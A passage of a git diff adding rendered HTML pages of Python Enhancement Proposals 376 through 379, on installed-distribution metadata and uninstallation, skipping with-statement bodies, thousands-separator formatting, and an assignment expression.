Under some circumstances, you might not be able to know for sure that you +have removed everything, or that you didn’t break another distribution by +removing a file that is shared among several distributions.

+

But there’s a common behavior: when you install a distribution, files are +copied in your system. And it’s possible to keep track of these files for +later removal.

+

Moreover, the Pip project has gained an uninstall feature lately. It +records all installed files, using the record option of the install +command.

+
+
+

What this PEP proposes

+

To address those issues, this PEP proposes a few changes:

+
    +
  • A new .dist-info structure using a directory, inspired on one format of +the EggFormats standard from setuptools.
  • +
  • New APIs in pkgutil to be able to query the information of installed +distributions.
  • +
  • An uninstall function and an uninstall script in Distutils.
  • +
+
+
+
+

One .dist-info directory per installed distribution

+

This PEP proposes an installation format inspired by one of the options in the +EggFormats standard, the one that uses a distinct directory located in the +site-packages directory.

+

This distinct directory is named as follows:

+
name + '-' + version + '.dist-info'
+
+
+

This .dist-info directory can contain these files:

+
    +
  • METADATA: contains metadata, as described in PEP 345, PEP 314 and PEP 241.
  • +
  • RECORD: records the list of installed files
  • +
  • INSTALLER: records the name of the tool used to install the project
  • +
  • REQUESTED: the presence of this file indicates that the project +installation was explicitly requested (i.e., not installed as a dependency).
  • +
+

The METADATA, RECORD and INSTALLER files are mandatory, while REQUESTED may +be missing.

+

This proposal will not impact Python itself because the metadata files are not +used anywhere yet in the standard library besides Distutils.

+

It will impact the setuptools and pip projects but, given the fact that +they already work with a directory that contains a PKG-INFO file, the change +will have no deep consequences.

+
+

RECORD

+

A RECORD file is added inside the .dist-info directory at installation +time when installing a source distribution using the install command. +Notice that when installing a binary distribution created with bdist command +or a bdist-based command, the RECORD file will be installed as well since +these commands use the install command to create binary distributions.

+

The RECORD file holds the list of installed files. These correspond +to the files listed by the record option of the install command, and will +be generated by default. This allows the implementation of an uninstallation +feature, as explained later in this PEP. The install command also provides +an option to prevent the RECORD file from being written and this option +should be used when creating system packages.

+

Third-party installation tools also should not overwrite or delete files +that are not in a RECORD file without prompting or warning.

+

This RECORD file is inspired from PEP 262 FILES.

+

The RECORD file is a CSV file, composed of records, one line per +installed file. The csv module is used to read the file, with +these options:

+
    +
  • field delimiter : ,
  • +
  • quoting char : ".
  • +
  • line terminator : os.linesep (so \r\n or \n)
  • +
+

When a distribution is installed, files can be installed under:

+
    +
  • the base location: path defined by the --install-lib option, +which defaults to the site-packages directory.
  • +
  • the installation prefix: path defined by the --prefix option, which +defaults to sys.prefix.
  • +
  • any other path on the system.
  • +
+

Each record is composed of three elements:

+
    +
  • the file’s path
      +
    • a ‘/’-separated path, relative to the base location, if the file is +under the base location.
    • +
    • a ‘/’-separated path, relative to the base location, if the file +is under the installation prefix AND if the base location is a +subpath of the installation prefix.
    • +
    • an absolute path, using the local platform separator
    • +
    +
  • +
  • a hash of the file’s contents. +Notice that pyc and pyo generated files don’t have any hash because +they are automatically produced from py files. So checking the hash +of the corresponding py file is enough to decide if the file and +its associated pyc or pyo files have changed.

    The hash is either the empty string or the hash algorithm as named in +hashlib.algorithms_guaranteed, followed by the equals character +=, followed by the urlsafe-base64-nopad encoding of the digest +(base64.urlsafe_b64encode(digest) with trailing = removed).

    +
  • +
  • the file’s size in bytes
  • +
+

The csv module is used to generate this file, so the field separator is +“,”. Any “,” character found within a field is escaped automatically by +csv.

+

When the file is read, the U option is used so the universal newline +support (see PEP 278) is activated, avoiding any trouble +reading a file produced on a platform that uses a different new line +terminator.

+

Here’s an example of a RECORD file (extract):

+
lib/python2.6/site-packages/docutils/__init__.py,md5=nWt-Dge1eug4iAgqLS_uWg,9544
+lib/python2.6/site-packages/docutils/__init__.pyc,,
+lib/python2.6/site-packages/docutils/core.py,md5=X90C_JLIcC78PL74iuhPnA,66188
+lib/python2.6/site-packages/docutils/core.pyc,,
+lib/python2.6/site-packages/roman.py,md5=7YhfNczihNjOY0FXlupwBg,234
+lib/python2.6/site-packages/roman.pyc,,
+/usr/local/bin/rst2html.py,md5=g22D3amDLJP-FhBzCi7EvA,234
+/usr/local/bin/rst2html.pyc,,
+python2.6/site-packages/docutils-0.5.dist-info/METADATA,md5=ovJyUNzXdArGfmVyb0onyA,195
+lib/python2.6/site-packages/docutils-0.5.dist-info/RECORD,,
+
+
+

Notice that the RECORD file can’t contain a hash of itself and is just mentioned here

+

A project that installs a config.ini file in /etc/myapp will be added like this:

+
/etc/myapp/config.ini,md5=gLfd6IANquzGLhOkW4Mfgg,9544
+
+
+

For a windows platform, the drive letter is added for the absolute paths, +so a file that is copied in c:MyAppwill be:

+
c:\etc\myapp\config.ini,md5=gLfd6IANquzGLhOkW4Mfgg,9544
+
+
+
+
+

INSTALLER

+

The install command has a new option called installer. This option +is the name of the tool used to invoke the installation. It’s a normalized +lower-case string matching [a-z0-9_\-\.].

+
+
$ python setup.py install –installer=pkg-system
+

It defaults to distutils if not provided.

+

When a distribution is installed, the INSTALLER file is generated in the +.dist-info directory with this value, to keep track of who installed the +distribution. The file is a single-line text file.

+
+
+

REQUESTED

+

Some install tools automatically detect unfulfilled dependencies and +install them. In these cases, it is useful to track which +distributions were installed purely as a dependency, so if their +dependent distribution is later uninstalled, the user can be alerted +of the orphaned dependency.

+

If a distribution is installed by direct user request (the usual +case), a file REQUESTED is added to the .dist-info directory of the +installed distribution. The REQUESTED file may be empty, or may +contain a marker comment line beginning with the “#” character.

+

If an install tool installs a distribution automatically, as a +dependency of another distribution, the REQUESTED file should not be +created.

+

The install command of distutils by default creates the REQUESTED +file. It accepts --requested and --no-requested options to explicitly +specify whether the file is created.

+

If a distribution that was already installed on the system as a dependency +is later installed by name, the distutils install command will +create the REQUESTED file in the .dist-info directory of the existing +installation.

+
+
+
+

Implementation details

+

Note: this section is non-normative. In the end, this PEP was +implemented by third-party libraries and tools, not the standard +library.

+
+

New functions and classes in pkgutil

+

To use the .dist-info directory content, we need to add in the standard +library a set of APIs. The best place to put these APIs is pkgutil.

+
+

Functions

+

The new functions added in the pkgutil module are :

+
    +
  • distinfo_dirname(name, version) -> directory name
    +
    name is converted to a standard distribution name by replacing any +runs of non-alphanumeric characters with a single ‘-‘.

    version is converted to a standard version string. Spaces become +dots, and all other non-alphanumeric characters (except dots) become +dashes, with runs of multiple dashes condensed to a single dash.

    +

    Both attributes are then converted into their filename-escaped form, +i.e. any ‘-’ characters are replaced with ‘_’ other than the one in +‘dist-info’ and the one separating the name from the version number.

    +
    +
  • +
  • get_distributions() -> iterator of Distribution instances.

    Provides an iterator that looks for .dist-info directories in +sys.path and returns Distribution instances for +each one of them.

    +
  • +
  • get_distribution(name) -> Distribution or None.
  • +
  • obsoletes_distribution(name, version=None) -> iterator of Distribution +instances.

    Iterates over all distributions to find which distributions obsolete +name. If a version is provided, it will be used to filter the results.

    +
  • +
  • provides_distribution(name, version=None) -> iterator of Distribution +instances.

    Iterates over all distributions to find which distributions provide +name. If a version is provided, it will be used to filter the results. +Scans all elements in sys.path and looks for all directories ending with +.dist-info. Returns a Distribution corresponding to the +.dist-info directory that contains a METADATA that matches name +for the name metadata.

    +

    This function only returns the first result founded, since no more than one +values are expected. If the directory is not found, returns None.

    +
  • +
  • get_file_users(path) -> iterator of Distribution instances.

    Iterates over all distributions to find out which distributions uses path. +path can be a local absolute path or a relative ‘/’-separated path.

    +

    A local absolute path is an absolute path in which occurrences of ‘/’ +have been replaced by the system separator given by os.sep.

    +
  • +
+
+
+

Distribution class

+

A new class called Distribution is created with the path of the +.dist-info directory provided to the constructor. It reads the metadata +contained in METADATA when it is instantiated.

+

Distribution(path) -> instance

+
+
Creates a Distribution instance for the given path.
+

Distribution provides the following attributes:

+
    +
  • name: The name of the distribution.
  • +
  • metadata: A DistributionMetadata instance loaded with the +distribution’s METADATA file.
  • +
  • requested: A boolean that indicates whether the REQUESTED +metadata file is present (in other words, whether the distribution was +installed by user request).
  • +
+

And following methods:

+
    +
  • get_installed_files(local=False) -> iterator of (path, hash, size)

    Iterates over the RECORD entries and return a tuple (path, hash, size) +for each line. If local is True, the path is transformed into a +local absolute path. Otherwise the raw value from RECORD is returned.

    +

    A local absolute path is an absolute path in which occurrences of ‘/’ +have been replaced by the system separator given by os.sep.

    +
  • +
  • uses(path) -> Boolean

    Returns True if path is listed in RECORD. path +can be a local absolute path or a relative ‘/’-separated path.

    +
  • +
  • get_distinfo_file(path, binary=False) -> file object
    +
    Returns a file located under the .dist-info directory.

    Returns a file instance for the file pointed by path.

    +

    path has to be a ‘/’-separated path relative to the .dist-info +directory or an absolute path.

    +

    If path is an absolute path and doesn’t start with the .dist-info +directory path, a DistutilsError is raised.

    +

    If binary is True, opens the file in read-only binary mode (rb), +otherwise opens it in read-only mode (r).

    +
    +
  • +
  • get_distinfo_files(local=False) -> iterator of paths

    Iterates over the RECORD entries and returns paths for each line if the path +is pointing to a file located in the .dist-info directory or one of its +subdirectories.

    +

    If local is True, each path is transformed into a +local absolute path. Otherwise the raw value from RECORD is returned.

    +
  • +
+

Notice that the API is organized in five classes that work with directories +and Zip files (so it works with files included in Zip files, see PEP 273 for +more details). These classes are described in the documentation +of the prototype implementation for interested readers [7].

+
+
+

Examples

+

Let’s use some of the new APIs with our docutils example:

+
>>> from pkgutil import get_distribution, get_file_users, distinfo_dirname
+>>> dist = get_distribution('docutils')
+>>> dist.name
+'docutils'
+>>> dist.metadata.version
+'0.5'
+
+>>> distinfo_dirname('docutils', '0.5')
+'docutils-0.5.dist-info'
+
+>>> distinfo_dirname('python-ldap', '2.5')
+'python_ldap-2.5.dist-info'
+
+>>> distinfo_dirname('python-ldap', '2.5 a---5')
+'python_ldap-2.5.a_5.dist-info'
+
+>>> for path, hash, size in dist.get_installed_files()::
+...     print '%s %s %d' % (path, hash, size)
+...
+python2.6/site-packages/docutils/__init__.py,b690274f621402dda63bf11ba5373bf2,9544
+python2.6/site-packages/docutils/core.py,9c4b84aff68aa55f2e9bf70481b94333,66188
+python2.6/site-packages/roman.py,a4b84aff68aa55f2e9bf70481b943D3,234
+/usr/local/bin/rst2html.py,a4b84aff68aa55f2e9bf70481b943D3,234
+python2.6/site-packages/docutils-0.5.dist-info/METADATA,6fe57de576d749536082d8e205b77748,195
+python2.6/site-packages/docutils-0.5.dist-info/RECORD
+
+>>> dist.uses('docutils/core.py')
+True
+
+>>> dist.uses('/usr/local/bin/rst2html.py')
+True
+
+>>> dist.get_distinfo_file('METADATA')
+<open file at ...>
+
+>>> dist.requested
+True
+
+
+
+
+
+

New functions in Distutils

+

Distutils already provides a very basic way to install a distribution, which +is running the install command over the setup.py script of the +distribution.

+

Distutils2 will provide a very basic uninstall function, that +is added in distutils2.util and takes the name of the distribution to +uninstall as its argument. uninstall uses the APIs described earlier and +remove all unique files, as long as their hash didn’t change. Then it removes +empty directories left behind.

+

uninstall returns a list of uninstalled files:

+
>>> from distutils2.util import uninstall
+>>> uninstall('docutils')
+['/opt/local/lib/python2.6/site-packages/docutils/core.py',
+ ...
+ '/opt/local/lib/python2.6/site-packages/docutils/__init__.py']
+
+
+

If the distribution is not found, a DistutilsUninstallError is raised.

+
+

Filtering

+

To make it a reference API for third-party projects that wish to control +how uninstall works, a second callable argument can be used. It’s +called for each file that is removed. If the callable returns True, the +file is removed. If it returns False, it’s left alone.

+

Examples:

+
>>> def _remove_and_log(path):
+...     logging.info('Removing %s' % path)
+...     return True
+...
+>>> uninstall('docutils', _remove_and_log)
+
+>>> def _dry_run(path):
+...     logging.info('Removing %s (dry run)' % path)
+...     return False
+...
+>>> uninstall('docutils', _dry_run)
+
+
+

Of course, a third-party tool can use lower-level pkgutil APIs to +implement its own uninstall feature.

+
+
+

Installer marker

+

As explained earlier in this PEP, the install command adds an INSTALLER +file in the .dist-info directory with the name of the installer.

+

To avoid removing distributions that were installed by another packaging +system, the uninstall function takes an extra argument installer which +defaults to distutils2.

+

When called, uninstall controls that the INSTALLER file matches +this argument. If not, it raises a DistutilsUninstallError:

+
>>> uninstall('docutils')
+Traceback (most recent call last):
+...
+DistutilsUninstallError: docutils was installed by 'cool-pkg-manager'
+
+>>> uninstall('docutils', installer='cool-pkg-manager')
+
+
+

This allows a third-party application to use the uninstall function +and strongly suggest that no other program remove a distribution it has +previously installed. This is useful when a third-party program that relies +on Distutils APIs does extra steps on the system at installation time, +it has to undo at uninstallation time.

+
+
+

Adding an Uninstall script

+

An uninstall script is added in Distutils2. and is used like this:

+
$ python -m distutils2.uninstall projectname
+
+
+

Notice that script doesn’t control if the removal of a distribution breaks +another distribution. Although it makes sure that all the files it removes +are not used by any other distribution, by using the uninstall function.

+

Also note that this uninstall script pays no attention to the +REQUESTED metadata; that is provided only for use by external tools to +provide more advanced dependency management.

+
+
+
+
+

Backward compatibility and roadmap

+

These changes don’t introduce any compatibility problems since they +will be implemented in:

+
    +
  • pkgutil in new functions
  • +
  • distutils2
  • +
+

The plan is to include the functionality outlined in this PEP in pkgutil for +Python 3.2, and in Distutils2.

+

Distutils2 will also contain a backport of the new pgkutil, and can be used for +2.4 onward.

+

Distributions installed using existing, pre-standardization formats do not have +the necessary metadata available for the new API, and thus will be +ignored. Third-party tools may of course to continue to support previous +formats in addition to the new format, in order to ease the transition.

+
+
+

References

+ +
+
+

Acknowledgements

+

Jim Fulton, Ian Bicking, Phillip Eby, Rafael Villar Burke, and many people at +Pycon and Distutils-SIG.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0376.rst

+

Last modified: 2024-12-15 20:57:13 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0377/index.html b/pep-0377/index.html new file mode 100644 index 00000000000..29dba8e92a4 --- /dev/null +++ b/pep-0377/index.html @@ -0,0 +1,394 @@ + + + + + + + + PEP 377 – Allow __enter__() methods to skip the statement body | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 377 – Allow __enter__() methods to skip the statement body

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
08-Mar-2009
+
Python-Version:
+
2.7, 3.1
+
Post-History:
+
08-Mar-2009
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a backwards compatible mechanism that allows __enter__() +methods to skip the body of the associated with statement. The lack of +this ability currently means the contextlib.contextmanager decorator +is unable to fulfil its specification of being able to turn arbitrary +code into a context manager by moving it into a generator function +with a yield in the appropriate location. One symptom of this is that +contextlib.nested will currently raise RuntimeError in +situations where writing out the corresponding nested with +statements would not [1].

+

The proposed change is to introduce a new flow control exception +SkipStatement, and skip the execution of the with +statement body if __enter__() raises this exception.

+
+
+

PEP Rejection

+

This PEP was rejected by Guido [4] as it imposes too great an increase +in complexity without a proportional increase in expressiveness and +correctness. In the absence of compelling use cases that need the more +complex semantics proposed by this PEP the existing behaviour is +considered acceptable.

+
+
+

Proposed Change

+

The semantics of the with statement will be changed to include a +new try/except/else block around the call to __enter__(). +If SkipStatement is raised by the __enter__() method, then +the main section of the with statement (now located in the else +clause) will not be executed. To avoid leaving the names in any as +clause unbound in this case, a new StatementSkipped singleton +(similar to the existing NotImplemented singleton) will be +assigned to all names that appear in the as clause.

+

The components of the with statement remain as described in PEP 343:

+
with EXPR as VAR:
+    BLOCK
+
+
+

After the modification, the with statement semantics would +be as follows:

+
mgr = (EXPR)
+exit = mgr.__exit__  # Not calling it yet
+try:
+    value = mgr.__enter__()
+except SkipStatement:
+    VAR = StatementSkipped
+    # Only if "as VAR" is present and
+    # VAR is a single name
+    # If VAR is a tuple of names, then StatementSkipped
+    # will be assigned to each name in the tuple
+else:
+    exc = True
+    try:
+        try:
+            VAR = value  # Only if "as VAR" is present
+            BLOCK
+        except:
+            # The exceptional case is handled here
+            exc = False
+            if not exit(*sys.exc_info()):
+                raise
+            # The exception is swallowed if exit() returns true
+    finally:
+        # The normal and non-local-goto cases are handled here
+        if exc:
+            exit(None, None, None)
+
+
+

With the above change in place for the with statement semantics, +contextlib.contextmanager() will then be modified to raise +SkipStatement instead of RuntimeError when the underlying +generator doesn’t yield.

+
+
+

Rationale for Change

+

Currently, some apparently innocuous context managers may raise +RuntimeError when executed. This occurs when the context +manager’s __enter__() method encounters a situation where +the written out version of the code corresponding to the +context manager would skip the code that is now the body +of the with statement. Since the __enter__() method +has no mechanism available to signal this to the interpreter, +it is instead forced to raise an exception that not only +skips the body of the with statement, but also jumps over +all code until the nearest exception handler. This goes against +one of the design goals of the with statement, which was to +be able to factor out arbitrary common exception handling code +into a single context manager by putting into a generator +function and replacing the variant part of the code with a +yield statement.

+

Specifically, the following examples behave differently if +cmB().__enter__() raises an exception which cmA().__exit__() +then handles and suppresses:

+
with cmA():
+  with cmB():
+    do_stuff()
+# This will resume here without executing "do_stuff()"
+
+@contextlib.contextmanager
+def combined():
+  with cmA():
+    with cmB():
+      yield
+
+with combined():
+  do_stuff()
+# This will raise a RuntimeError complaining that the context
+# manager's underlying generator didn't yield
+
+with contextlib.nested(cmA(), cmB()):
+  do_stuff()
+# This will raise the same RuntimeError as the contextmanager()
+# example (unsurprising, given that the nested() implementation
+# uses contextmanager())
+
+# The following class based version shows that the issue isn't
+# specific to contextlib.contextmanager() (it also shows how
+# much simpler it is to write context managers as generators
+# instead of as classes!)
+class CM(object):
+  def __init__(self):
+    self.cmA = None
+    self.cmB = None
+
+  def __enter__(self):
+    if self.cmA is not None:
+      raise RuntimeError("Can't re-use this CM")
+    self.cmA = cmA()
+    self.cmA.__enter__()
+    try:
+      self.cmB = cmB()
+      self.cmB.__enter__()
+    except:
+      self.cmA.__exit__(*sys.exc_info())
+      # Can't suppress in __enter__(), so must raise
+      raise
+
+  def __exit__(self, *args):
+    suppress = False
+    try:
+      if self.cmB is not None:
+        suppress = self.cmB.__exit__(*args)
+    except:
+      suppress = self.cmA.__exit__(*sys.exc_info()):
+      if not suppress:
+        # Exception has changed, so reraise explicitly
+        raise
+    else:
+      if suppress:
+        # cmB already suppressed the exception,
+        # so don't pass it to cmA
+        suppress = self.cmA.__exit__(None, None, None):
+      else:
+        suppress = self.cmA.__exit__(*args):
+    return suppress
+
+
+

With the proposed semantic change in place, the contextlib based examples +above would then “just work”, but the class based version would need +a small adjustment to take advantage of the new semantics:

+
class CM(object):
+  def __init__(self):
+    self.cmA = None
+    self.cmB = None
+
+  def __enter__(self):
+    if self.cmA is not None:
+      raise RuntimeError("Can't re-use this CM")
+    self.cmA = cmA()
+    self.cmA.__enter__()
+    try:
+      self.cmB = cmB()
+      self.cmB.__enter__()
+    except:
+      if self.cmA.__exit__(*sys.exc_info()):
+        # Suppress the exception, but don't run
+        # the body of the with statement either
+        raise SkipStatement
+      raise
+
+  def __exit__(self, *args):
+    suppress = False
+    try:
+      if self.cmB is not None:
+        suppress = self.cmB.__exit__(*args)
+    except:
+      suppress = self.cmA.__exit__(*sys.exc_info()):
+      if not suppress:
+        # Exception has changed, so reraise explicitly
+        raise
+    else:
+      if suppress:
+        # cmB already suppressed the exception,
+        # so don't pass it to cmA
+        suppress = self.cmA.__exit__(None, None, None):
+      else:
+        suppress = self.cmA.__exit__(*args):
+    return suppress
+
+
+

There is currently a tentative suggestion [3] to add import-style syntax to +the with statement to allow multiple context managers to be included in +a single with statement without needing to use contextlib.nested. In +that case the compiler has the option of simply emitting multiple with +statements at the AST level, thus allowing the semantics of actual nested +with statements to be reproduced accurately. However, such a change +would highlight rather than alleviate the problem the current PEP aims to +address: it would not be possible to use contextlib.contextmanager to +reliably factor out such with statements, as they would exhibit exactly +the same semantic differences as are seen with the combined() context +manager in the above example.

+
+
+

Performance Impact

+

Implementing the new semantics makes it necessary to store the references +to the __enter__ and __exit__ methods in temporary variables instead +of on the stack. This results in a slight regression in with statement +speed relative to Python 2.6/3.1. However, implementing a custom +SETUP_WITH opcode would negate any differences between the two +approaches (as well as dramatically improving speed by eliminating more +than a dozen unnecessary trips around the eval loop).

+
+
+

Reference Implementation

+

Patch attached to Issue 5251 [1]. That patch uses only existing opcodes +(i.e. no SETUP_WITH).

+
+
+

Acknowledgements

+

James William Pye both raised the issue and suggested the basic outline of +the solution described in this PEP.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0377.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0378/index.html b/pep-0378/index.html new file mode 100644 index 00000000000..f16d8798299 --- /dev/null +++ b/pep-0378/index.html @@ -0,0 +1,319 @@ + + + + + + + + PEP 378 – Format Specifier for Thousands Separator | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 378 – Format Specifier for Thousands Separator

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Mar-2009
+
Python-Version:
+
2.7, 3.1
+
Post-History:
+
12-Mar-2009
+
+
+
+
Table of Contents +
+
+

Motivation

+

Provide a simple, non-locale aware way to format a number +with a thousands separator.

+

Adding thousands separators is one of the simplest ways to +humanize a program’s output, improving its professional appearance +and readability.

+

In the finance world, output with thousands separators is the norm. +Finance users and non-professional programmers find the locale +approach to be frustrating, arcane and non-obvious.

+

The locale module presents two other challenges. First, it is +a global setting and not suitable for multi-threaded apps that +need to serve-up requests in multiple locales. Second, the +name of a relevant locale (such as “de_DE”) can vary from +platform to platform or may not be defined at all. The docs +for the locale module describe these and many other challenges +in detail.

+

It is not the goal to replace the locale module, to perform +internationalization tasks, or accommodate every possible +convention. Such tasks are better suited to robust tools like +Babel. Instead, the goal is to make a common, everyday +task easier for many users.

+
+
+

Main Proposal (from Alyssa Coghlan, originally called Proposal I)

+

A comma will be added to the format() specifier mini-language:

+
[[fill]align][sign][#][0][width][,][.precision][type]
+
+
+

The ‘,’ option indicates that commas should be included in the +output as a thousands separator. As with locales which do not +use a period as the decimal point, locales which use a +different convention for digit separation will need to use the +locale module to obtain appropriate formatting.

+

The proposal works well with floats, ints, and decimals. +It also allows easy substitution for other separators. +For example:

+
format(n, "6,d").replace(",", "_")
+
+
+

This technique is completely general but it is awkward in the +one case where the commas and periods need to be swapped:

+
format(n, "6,f").replace(",", "X").replace(".", ",").replace("X", ".")
+
+
+

The width argument means the total length including the commas +and decimal point:

+
format(1234, "08,d")     -->    '0001,234'
+format(1234.5, "08,.1f") -->    '01,234.5'
+
+
+

The ‘,’ option is defined as shown above for types ‘d’, ‘e’, +‘f’, ‘g’, ‘E’, ‘G’, ‘%’, ‘F’ and ‘’. To allow future extensions, it is +undefined for other types: binary, octal, hex, character, +etc.

+

This proposal has the virtue of being simpler than the alternative +proposal but is much less flexible and meets the needs of fewer +users right out of the box. It is expected that some other +solution will arise for specifying alternative separators.

+
+
+

Current Version of the Mini-Language

+ +
+
+

Research into what Other Languages Do

+

Scanning the web, I’ve found that thousands separators are +usually one of COMMA, DOT, SPACE, APOSTROPHE or UNDERSCORE.

+

C-Sharp provides both styles (picture formatting and type specifiers). +The type specifier approach is locale aware. The picture formatting only +offers a COMMA as a thousands separator:

+
String.Format("{0:n}", 12400)     ==>    "12,400"
+String.Format("{0:0,0}", 12400)   ==>    "12,400"
+
+
+

Common Lisp uses a COLON before the ~D decimal type specifier to +emit a COMMA as a thousands separator. The general form of ~D is +~mincol,padchar,commachar,commaintervalD. The padchar defaults +to SPACE. The commachar defaults to COMMA. The commainterval +defaults to three.

+
(format nil "~:D" 229345007)   =>   "229,345,007"
+
+
+
    +
  • The ADA language allows UNDERSCORES in its numeric literals.
  • +
+

Visual Basic and its brethren (like MS Excel) use a completely +different style and have ultra-flexible custom format +specifiers like:

+
"_($* #,##0_)".
+
+
+

COBOL uses picture clauses like:

+
PICTURE $***,**9.99CR
+
+
+

Java offers a Decimal.Format Class that uses picture patterns (one +for positive numbers and an optional one for negatives) such as: +"#,##0.00;(#,##0.00)". It allows arbitrary groupings including +hundreds and ten-thousands and uneven groupings. The special pattern +characters are non-localized (using a DOT for a decimal separator and +a COMMA for a grouping separator). The user can supply an alternate +set of symbols using the formatter’s DecimalFormatSymbols object.

+
+
+

Alternative Proposal (from Eric Smith, originally called Proposal II)

+

Make both the thousands separator and decimal separator user +specifiable but not locale aware. For simplicity, limit the +choices to a COMMA, DOT, SPACE, APOSTROPHE or UNDERSCORE. +The SPACE can be either U+0020 or U+00A0.

+

Whenever a separator is followed by a precision, it is a +decimal separator and an optional separator preceding it is a +thousands separator. When the precision is absent, a lone +specifier means a thousands separator:

+
[[fill]align][sign][#][0][width][tsep][dsep precision][type]
+
+
+

Examples:

+
format(1234, "8.1f")     -->    '  1234.0'
+format(1234, "8,1f")     -->    '  1234,0'
+format(1234, "8.,1f")    -->    ' 1.234,0'
+format(1234, "8 ,f")     -->    ' 1 234,0'
+format(1234, "8d")       -->    '    1234'
+format(1234, "8,d")      -->    '   1,234'
+format(1234, "8_d")      -->    '   1_234'
+
+
+

This proposal meets mosts needs, but it comes at the expense +of taking a bit more effort to parse. Not every possible +convention is covered, but at least one of the options (spaces +or underscores) should be readable, understandable, and useful +to folks from many diverse backgrounds.

+

As shown in the examples, the width argument means the total +length including the thousands separators and decimal separators.

+

No change is proposed for the locale module.

+

The thousands separator is defined as shown above for types +‘d’, ‘e’, ‘f’, ‘g’, ‘%’, ‘E’, ‘G’ and ‘F’. To allow future +extensions, it is undefined for other types: binary, octal, +hex, character, etc.

+

The drawback to this alternative proposal is the difficulty +of mentally parsing whether a single separator is a thousands +separator or decimal separator. Perhaps it is too arcane +to link the decimal separator with the precision specifier.

+
+
+

Commentary

+
    +
  • Some commenters do not like the idea of format strings at all +and find them to be unreadable. Suggested alternatives include +the COBOL style PICTURE approach or a convenience function with +keyword arguments for every possible combination.
  • +
  • Some newsgroup respondants think there is no place for any +scripts that are not internationalized and that it is a step +backwards to provide a simple way to hardwire a particular choice +(thus reducing incentive to use a locale sensitive approach).
  • +
  • Another thought is that embedding some particular convention in +individual format strings makes it hard to change that convention +later. No workable alternative was suggested but the general idea +is to set the convention once and have it apply everywhere (others +commented that locale already provides a way to do this).
  • +
  • There are some precedents for grouping digits in the fractional +part of a floating point number, but this PEP does not venture into +that territory. Only digits to the left of the decimal point are +grouped. This does not preclude future extensions; it just focuses +on a single, generally useful extension to the formatting language.
  • +
  • James Knight observed that Indian/Pakistani numbering systems +group by hundreds. Ben Finney noted that Chinese group by +ten-thousands. Eric Smith pointed-out that these are already +handled by the “n” specifier in the locale module (albeit only +for integers). This PEP does not attempt to support all of those +possibilities. It focuses on a single, relatively common grouping +convention that offers a quick way to improve readability in many +(though not all) contexts.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0378.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0379/index.html b/pep-0379/index.html new file mode 100644 index 00000000000..0d91a7b6868 --- /dev/null +++ b/pep-0379/index.html @@ -0,0 +1,301 @@ + + + + + + + + PEP 379 – Adding an Assignment Expression | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 379 – Adding an Assignment Expression

+
+
Author:
+
Jervis Whitley <jervisau at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
14-Mar-2009
+
Python-Version:
+
2.7, 3.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds a new assignment expression to the Python language +to make it possible to assign the result of an expression in +almost any place. The new expression will allow the assignment of +the result of an expression at first use (in a comparison for +example).

+
+
+

Motivation and Summary

+

Issue1714448 “if something as x:” [1] describes a feature to allow +assignment of the result of an expression in an if statement to a +name. It supposed that the as syntax could be borrowed for this +purpose. Many times it is not the expression itself that is +interesting, rather one of the terms that make up the +expression. To be clear, something like this:

+
if (f_result() == [1, 2, 3]) as res:
+
+
+

seems awfully limited, when this:

+
if (f_result() as res) == [1, 2, 3]:
+
+
+

is probably the desired result.

+
+
+

Use Cases

+

See the Examples section near the end.

+
+
+

Specification

+

A new expression is proposed with the (nominal) syntax:

+
EXPR -> VAR
+
+
+

This single expression does the following:

+
    +
  • Evaluate the value of EXPR, an arbitrary expression;
  • +
  • Assign the result to VAR, a single assignment target; and
  • +
  • Leave the result of EXPR on the Top of Stack (TOS)
  • +
+

Here -> or (RARROW) has been used to illustrate the concept that +the result of EXPR is assigned to VAR.

+

The translation of the proposed syntax is:

+
VAR = (EXPR)
+(EXPR)
+
+
+

The assignment target can be either an attribute, a subscript or +name:

+
f() -> name[0]      # where 'name' exists previously.
+
+f() -> name.attr    # again 'name' exists prior to this expression.
+
+f() -> name
+
+
+

This expression should be available anywhere that an expression is +currently accepted.

+

All exceptions that are currently raised during invalid +assignments will continue to be raised when using the assignment +expression. For example, a NameError will be raised when in +example 1 and 2 above if name is not previously defined, or an +IndexError if index 0 was out of range.

+
+
+

Examples from the Standard Library

+

The following two examples were chosen after a brief search +through the standard library, specifically both are from ast.py +which happened to be open at the time of the search.

+

Original:

+
def walk(node):
+    from collections import deque
+    todo = deque([node])
+    while todo:
+        node = todo.popleft()
+        todo.extend(iter_child_nodes(node))
+        yield node
+
+
+

Using assignment expression:

+
def walk(node):
+    from collections import deque
+    todo = deque([node])
+    while todo:
+        todo.extend(iter_child_nodes(todo.popleft() -> node))
+        yield node
+
+
+

Original:

+
def get_docstring(node, clean=True):
+    if not isinstance(node, (FunctionDef, ClassDef, Module)):
+        raise TypeError("%r can't have docstrings"
+                            % node.__class__.__name__)
